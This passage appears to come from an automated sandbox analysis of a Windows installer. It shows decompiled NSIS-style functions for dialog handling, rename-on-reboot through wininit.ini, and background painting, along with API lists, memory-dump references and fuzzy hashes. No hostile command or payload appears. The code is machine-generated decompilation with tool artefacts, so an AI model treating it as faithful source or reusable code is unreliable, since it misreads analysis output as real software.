                                            0x00403aa2
                                            0x00403aa3
                                            0x00403aa3
                                            0x00403aa8
                                            0x00403ab5
                                            0x00403abb
                                            0x00403abd
                                            0x00403afd
                                            0x00403b02
                                            0x00403b07
                                            0x00403b07
                                            0x00403b0c
                                            0x00403b15
                                            0x00403b17
                                            0x00403b1c
                                            0x00403b22
                                            0x00403b26
                                            0x00403b26
                                            0x00403b2b
                                            0x00403b32
                                            0x00000000
                                            0x00000000
                                            0x00403b3d
                                            0x00403b43
                                            0x00000000
                                            0x00000000
                                            0x00403b49
                                            0x00403b4c
                                            0x00403b4f
                                            0x00403b54
                                            0x00403b59
                                            0x00403b5c
                                            0x00403b62
                                            0x00403b67
                                            0x00403b6a
                                            0x00403b70
                                            0x00403b75
                                            0x00403b78
                                            0x00403b7e
                                            0x00403b86
                                            0x00403b8c
                                            0x00403b93
                                            0x00403b95
                                            0x00403b9c
                                            0x00403b9c
                                            0x00403b9c
                                            0x00403ba6
                                            0x00403bb5
                                            0x00403bc1
                                            0x00403bd0
                                            0x00403be7
                                            0x00403be9
                                            0x00403bef
                                            0x00403c04
                                            0x00403bf1
                                            0x00403bfa
                                            0x00403bfc
                                            0x00403bfc
                                            0x00403c0a
                                            0x00403c1a
                                            0x00403c1f
                                            0x00403c2a
                                            0x00403c2b
                                            0x00403c32
                                            0x00403c38
                                            0x00403c3c
                                            0x00403c41
                                            0x00403c43
                                            0x00000000
                                            0x00403c49
                                            0x00403c49
                                            0x00403c4b
                                            0x00000000
                                            0x00000000
                                            0x00403c51
                                            0x00403c55
                                            0x00403c7a
                                            0x00403c80
                                            0x00403c86
                                            0x00403c89
                                            0x00403caf
                                            0x00403cb5
                                            0x00403cb7
                                            0x00403cbc
                                            0x00403cc2
                                            0x00403cc5
                                            0x00403cc8
                                            0x00403cdf
                                            0x00403ceb
                                            0x00403d06
                                            0x00403d0c
                                            0x00403d10
                                            0x00403d1d
                                            0x00403d28
                                            0x00403d28
                                            0x00403cbc
                                            0x00000000
                                            0x00403c89
                                            0x00403c57
                                            0x00403c5d
                                            0x00000000
                                            0x00000000
                                            0x00403c63
                                            0x00403c69
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403c6f
                                            0x00403c43
                                            0x00403d35
                                            0x00403d41
                                            0x00403d41
                                            0x00403d49
                                            0x00000000
                                            0x00403abf
                                            0x00403abf
                                            0x00403ac2
                                            0x00403af5
                                            0x00403af5
                                            0x00403af7
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403af7
                                            0x00403ac4
                                            0x00403ac8
                                            0x00403acd
                                            0x00403acf
                                            0x00000000
                                            0x00000000
                                            0x00403adf
                                            0x00403ae7
                                            0x00000000
                                            0x00403aed
                                            0x004038e3
                                            0x004038e3
                                            0x004038ea
                                            0x004038fb
                                            0x004038fb
                                            0x00403904
                                            0x0040390d
                                            0x00403918
                                            0x00403918
                                            0x00403924
                                            0x00403940
                                            0x00403943
                                            0x00403958
                                            0x0040395b
                                            0x00403990
                                            0x00403990
                                            0x00403996
                                            0x00403a37
                                            0x00000000
                                            0x00403a40
                                            0x0040399c
                                            0x004039af
                                            0x004039b1
                                            0x004039b3
                                            0x004039d0
                                            0x004039d3
                                            0x004039d5
                                            0x004039da
                                            0x004039dd
                                            0x004039ec
                                            0x004039ef
                                            0x00403a22
                                            0x00403a35
                                            0x00000000
                                            0x00403a35
                                            0x004039f1
                                            0x004039f8
                                            0x00403a11
                                            0x00403a16
                                            0x00403a18
                                            0x00000000
                                            0x00000000
                                            0x00403a1a
                                            0x00403a06
                                            0x00403a06
                                            0x00403a08
                                            0x00403a08
                                            0x00000000
                                            0x00403a08
                                            0x004039fb
                                            0x00403a00
                                            0x00000000
                                            0x00403a00
                                            0x004039df
                                            0x004039e6
                                            0x00000000
                                            0x00000000
                                            0x004039e8
                                            0x00000000
                                            0x004039e8
                                            0x004039d7
                                            0x00000000
                                            0x004039d7
                                            0x004039bf
                                            0x004039c2
                                            0x004039c8
                                            0x004039ca
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004039ca
                                            0x00403963
                                            0x00403969
                                            0x00000000
                                            0x00000000
                                            0x00403975
                                            0x0040397b
                                            0x0040397d
                                            0x00000000
                                            0x00000000
                                            0x00403983
                                            0x00403988
                                            0x00000000
                                            0x00403988
                                            0x0040394a
                                            0x00000000
                                            0x00403926
                                            0x0040392c
                                            0x00403936
                                            0x00403d4f
                                            0x00403d56
                                            0x00403d64
                                            0x00403d6a
                                            0x00403d6a
                                            0x00403d74
                                            0x00000000
                                            0x00403d74
                                            0x00403924

                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038FB
                                            • ShowWindow.USER32(?), ref: 00403918
                                            • DestroyWindow.USER32 ref: 0040392C
                                            • SetWindowLongA.USER32 ref: 0040394A
                                            • IsWindowEnabled.USER32 ref: 00403975
                                            • GetDlgItem.USER32 ref: 004039A3
                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039BF
                                            • IsWindowEnabled.USER32(00000000), ref: 004039C2
                                            • GetDlgItem.USER32 ref: 00403A6A
                                            • GetDlgItem.USER32 ref: 00403A74
                                            • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A8E
                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403ADF
                                            • GetDlgItem.USER32 ref: 00403B86
                                            • ShowWindow.USER32(00000000,?), ref: 00403BA6
                                            • EnableWindow.USER32(00000000,?), ref: 00403BB5
                                            • EnableWindow.USER32(?,?), ref: 00403BD0
                                            • SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403BE7
                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BFA
                                            • lstrlenA.KERNEL32(0079F580,?,0079F580,007A2780), ref: 00403C23
                                            • SetWindowTextA.USER32(?,0079F580), ref: 00403C32
                                            • ShowWindow.USER32(?,0000000A), ref: 00403D64
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
                                            • String ID:
                                            • API String ID: 3950083612-0
                                            • Opcode ID: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                            • Instruction ID: 5dd3c4f218cf3e404d6a97a2e5ce8d1cdd0b8388a563f9de6f37f2f8e87629b5
                                            • Opcode Fuzzy Hash: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                            • Instruction Fuzzy Hash: 9DC1CC70904200AFD720AF25ED45E277FADEB89706F00453AF641B52F2D67DAA42CB1D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403EEF, Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 204windowstringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 92%
                                            			E00403EEF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x79f568 =  *0x79f568 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E0E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x7a1f20;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x7a2f84, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x7a2f84, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x79f568 != 0) {
						goto L25;
					} else {
						_t112 =  *0x79ed58 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403DC9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040417A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x7a275c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x7a2fb8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403EBB;
				E00403DA7(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403DA7(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403DC9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403DDC(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x7a2f88 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x79e54c =  *0x79e54c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x79f568 =  *0x79f568 & 0x00000000;
				return 0;
			}

















                                            0x00403eff
                                            0x00404025
                                            0x00404081
                                            0x00404085
                                            0x0040415c
                                            0x0040415e
                                            0x0040415e
                                            0x00404164
                                            0x00404164
                                            0x00404167
                                            0x00000000
                                            0x0040416e
                                            0x00404093
                                            0x00404095
                                            0x0040409f
                                            0x004040aa
                                            0x004040ad
                                            0x004040b0
                                            0x004040bb
                                            0x004040be
                                            0x004040c5
                                            0x004040d3
                                            0x004040eb
                                            0x004040fe
                                            0x0040410e
                                            0x00404110
                                            0x00404110
                                            0x004040c5
                                            0x0040411a
                                            0x00000000
                                            0x00404125
                                            0x00404129
                                            0x0040413a
                                            0x0040413a
                                            0x00404140
                                            0x0040414e
                                            0x0040414e
                                            0x00000000
                                            0x00404152
                                            0x0040411a
                                            0x00404030
                                            0x00000000
                                            0x00404044
                                            0x0040404a
                                            0x00404050
                                            0x00000000
                                            0x00000000
                                            0x00404075
                                            0x00404077
                                            0x0040407c
                                            0x00000000
                                            0x0040407c
                                            0x00404030
                                            0x00403f05
                                            0x00403f08
                                            0x00403f0d
                                            0x00403f1e
                                            0x00403f1e
                                            0x00403f25
                                            0x00403f28
                                            0x00403f2a
                                            0x00403f2f
                                            0x00403f38
                                            0x00403f3e
                                            0x00403f4a
                                            0x00403f4d
                                            0x00403f56
                                            0x00403f5b
                                            0x00403f5e
                                            0x00403f63
                                            0x00403f7a
                                            0x00403f81
                                            0x00403f94
                                            0x00403f97
                                            0x00403fac
                                            0x00403fb3
                                            0x00403fb8
                                            0x00403fbd
                                            0x00403fbd
                                            0x00403fcc
                                            0x00403fdb
                                            0x00403fdd
                                            0x00403ff3
                                            0x00404002
                                            0x00404004
                                            0x00000000

                                            APIs
                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F7A
                                            • GetDlgItem.USER32 ref: 00403F8E
                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FAC
                                            • GetSysColor.USER32(?), ref: 00403FBD
                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FCC
                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FDB
                                            • lstrlenA.KERNEL32(?), ref: 00403FE5
                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FF3
                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404002
                                            • GetDlgItem.USER32 ref: 00404065
                                            • SendMessageA.USER32(00000000), ref: 00404068
                                            • GetDlgItem.USER32 ref: 00404093
                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040D3
                                            • LoadCursorA.USER32 ref: 004040E2
                                            • SetCursor.USER32(00000000), ref: 004040EB
                                            • ShellExecuteA.SHELL32(0000070B,open,007A1F20,00000000,00000000,00000001), ref: 004040FE
                                            • LoadCursorA.USER32 ref: 0040410B
                                            • SetCursor.USER32(00000000), ref: 0040410E
                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040413A
                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040414E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                            • String ID: N$open
                                            • API String ID: 3615053054-904208323
                                            • Opcode ID: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                            • Instruction ID: 2049aa6b61ecefec59fc3e575142d3045787f4aa2f6754ef1ed68d4f44ea64a4
                                            • Opcode Fuzzy Hash: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                            • Instruction Fuzzy Hash: 7C61A171A40309BFEB109F60CC45F6A7B69EB94715F108026FB01BA2D1C7B8E991CF99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405707, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 151filememorystringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E00405707(long _a4, long _a16) {
				CHAR* _v0;
				intOrPtr* _t13;
				long _t14;
				int _t19;
				void* _t27;
				long _t28;
				intOrPtr* _t36;
				int _t42;
				intOrPtr* _t43;
				long _t48;
				CHAR* _t50;
				void* _t52;
				void* _t54;

				_t13 = E00405CD2("KERNEL32.dll", "MoveFileExA");
				_t50 = _v0;
				if(_t13 != 0) {
					_t19 =  *_t13(_a4, _t50, 5);
					if(_t19 != 0) {
						L16:
						 *0x7a3010 =  *0x7a3010 + 1;
						return _t19;
					}
				}
				 *0x7a1710 = 0x4c554e;
				if(_t50 == 0) {
					L5:
					_t14 = GetShortPathNameA(_a4, 0x7a1188, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						_t42 = wsprintfA(0x7a0d88, "%s=%s\r\n", 0x7a1710, 0x7a1188);
						GetWindowsDirectoryA(0x7a1188, 0x3f0);
						lstrcatA(0x7a1188, "\\wininit.ini");
						_t19 = CreateFileA(0x7a1188, 0xc0000000, 0, 0, 4, 0x8000080, 0);
						_t54 = _t19;
						if(_t54 == 0xffffffff) {
							goto L16;
						}
						_t48 = GetFileSize(_t54, 0);
						_t5 = _t42 + 0xa; // 0xa
						_t52 = GlobalAlloc(0x40, _t48 + _t5);
						if(_t52 == 0 || ReadFile(_t54, _t52, _t48,  &_a16, 0) == 0 || _t48 != _a16) {
							L15:
							_t19 = CloseHandle(_t54);
							goto L16;
						} else {
							if(E00405624(_t52, "[Rename]\r\n") != 0) {
								_t27 = E00405624(_t25 + 0xa, "\n[");
								if(_t27 == 0) {
									L13:
									_t28 = _t48;
									L14:
									E00405670(_t52 + _t28, 0x7a0d88, _t42);
									SetFilePointer(_t54, 0, 0, 0);
									WriteFile(_t54, _t52, _t48 + _t42,  &_a4, 0);
									GlobalFree(_t52);
									goto L15;
								}
								_t36 = _t27 + 1;
								_t43 = _t36;
								if(_t36 >= _t52 + _t48) {
									L21:
									_t28 = _t36 - _t52;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t42)) =  *_t43;
									_t43 = _t43 + 1;
								} while (_t43 < _t52 + _t48);
								goto L21;
							}
							E004059BF(_t52 + _t48, "[Rename]\r\n");
							_t48 = _t48 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E00405690(_t50, 0, 1));
					_t14 = GetShortPathNameA(_t50, 0x7a1710, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						goto L5;
					}
				}
				return _t14;
			}
















                                            0x00405715
                                            0x0040571c
                                            0x00405720
                                            0x00405729
                                            0x0040572d
                                            0x00405879
                                            0x00405879
                                            0x00000000
                                            0x00405879
                                            0x0040572d
                                            0x00405739
                                            0x0040574f
                                            0x00405777
                                            0x00405782
                                            0x00405786
                                            0x004057a9
                                            0x004057b1
                                            0x004057bd
                                            0x004057d4
                                            0x004057da
                                            0x004057df
                                            0x00000000
                                            0x00000000
                                            0x004057ee
                                            0x004057f0
                                            0x004057fd
                                            0x00405801
                                            0x00405872
                                            0x00405873
                                            0x00000000
                                            0x0040581d
                                            0x0040582a
                                            0x0040588f
                                            0x00405896
                                            0x0040583d
                                            0x0040583d
                                            0x0040583f
                                            0x00405848
                                            0x00405853
                                            0x00405865
                                            0x0040586c
                                            0x00000000
                                            0x0040586c
                                            0x00405898
                                            0x0040589e
                                            0x004058a0
                                            0x004058af
                                            0x004058af
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004058a2
                                            0x004058a2
                                            0x004058a4
                                            0x004058a7
                                            0x004058ab
                                            0x00000000
                                            0x004058a2
                                            0x00405835
                                            0x0040583a
                                            0x00000000
                                            0x0040583a
                                            0x00405801
                                            0x00405751
                                            0x0040575c
                                            0x00405765
                                            0x00405769
                                            0x00000000
                                            0x00000000
                                            0x00405769
                                            0x00405883

                                            APIs
                                              • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                              • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                              • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                            • GetShortPathNameA.KERNEL32 ref: 00405765
                                            • GetShortPathNameA.KERNEL32 ref: 00405782
                                            • wsprintfA.USER32 ref: 004057A0
                                            • GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                            • lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                            • CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007A0D88,00000000,-0000000A,00409308,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405853
                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405865
                                            • GlobalFree.KERNEL32 ref: 0040586C
                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405873
                                              • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                              • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocCreateDirectoryFreeLibraryLoadModulePointerProcReadSizeWindowsWritelstrcatwsprintf
                                            • String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]$\wininit.ini
                                            • API String ID: 3633819597-1342836890
                                            • Opcode ID: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                            • Instruction ID: e9cd1c615693de8fff4c10b400b586db3ed10c1a7fdb79d3500086280aae1fa0
                                            • Opcode Fuzzy Hash: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                            • Instruction Fuzzy Hash: 8F412132640A057AE32027228C49F6B3A5CDF95745F144636FE06F62D2EA78EC018AAD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 90%
                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a2f88;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x7a2780, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a2f84;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                            0x0040100a
                                            0x00401039
                                            0x00401047
                                            0x0040104d
                                            0x00401051
                                            0x0040105b
                                            0x00401061
                                            0x00401064
                                            0x004010f3
                                            0x00401089
                                            0x0040108c
                                            0x004010a6
                                            0x004010bd
                                            0x004010cc
                                            0x004010cf
                                            0x004010d5
                                            0x004010d9
                                            0x004010e4
                                            0x004010ed
                                            0x004010ef
                                            0x004010ef
                                            0x00401100
                                            0x00401105
                                            0x0040110d
                                            0x00401110
                                            0x00401112
                                            0x00401118
                                            0x0040111f
                                            0x00401126
                                            0x00401130
                                            0x00401142
                                            0x00401156
                                            0x00401160
                                            0x00401165
                                            0x00401165
                                            0x00401110
                                            0x0040116e
                                            0x00000000
                                            0x00401178
                                            0x00401010
                                            0x00401013
                                            0x00401015
                                            0x0040101f
                                            0x0040101f
                                            0x00000000

                                            APIs
                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32 ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32 ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextA.USER32(00000000,007A2780,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            • Opcode ID: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                            • Instruction ID: ce6c75dd9c322714a436959803478fdb1fd492375a9fced856522196e90364b0
